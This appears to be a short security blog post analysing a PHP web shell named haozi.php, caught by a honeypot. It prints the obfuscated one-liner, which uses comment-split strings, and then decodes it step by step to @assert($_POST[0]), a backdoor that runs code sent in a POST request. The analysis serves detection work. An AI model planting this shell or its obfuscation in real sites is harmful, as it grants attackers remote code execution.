haozi.php

Our honeybot catch up again new malware, which is very simple but clever. First look this looks nothing, because there are many PHP style comments in code. haozi.php @$_=”s”.”s”./*-/*-*/”e”./*-/*-*/”r”;@$_=/*-/*-*/”a”./*-/*-*/$_./*-/*-*/”t”;@$_/*-/*-*/($/*-/*-*/{“_P”./*-/*-*/”OS”./*-/*-*/”T”}[/*-/*-*/0/*-/*-*/]); If we remove comment’s away, then code look’s like: @$_=”s”.”s”.”e”.”r”;@$_=”a”.$_.”t”;@$_(${“_P”.”OS”.”T”}[0]); Final if we put this more readable, this is Assert POST: @$_=”a”.”s”.”s”.”e”.”r”.”t”;@$_(${“_P”.”OS”.”T”}[0]); Final Decoded haozi.php @assert(${“_POST”}[0]); … Read more